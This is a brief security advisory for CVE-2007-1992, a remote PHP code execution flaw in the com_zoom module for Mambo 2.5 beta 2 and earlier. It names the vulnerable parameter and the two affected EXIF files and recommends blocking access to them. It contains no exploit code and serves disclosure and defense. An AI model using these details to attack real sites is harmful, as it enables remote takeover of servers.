CVE-2007-1992

Name of the Vulnerable Software and Affected Versions com zoom module for Mambo versions 2.5 beta 2 and earlier

Description The issue allows remote attackers to execute arbitrary PHP code. This is achieved by providing a URL in the mosConfig absolute path parameter to specific PHP files, including (1) EXIF Makernote.php or (2) EXIF.php in the classes/iptc/ directory.

Recommendations For com zoom module for Mambo versions 2.5 beta 2 and earlier, consider disabling access to the EXIF Makernote.php and EXIF.php files in the classes/iptc/ directory until a patch is available. Avoid using the mosConfig absolute path parameter in the affected module to minimize the risk of exploitation.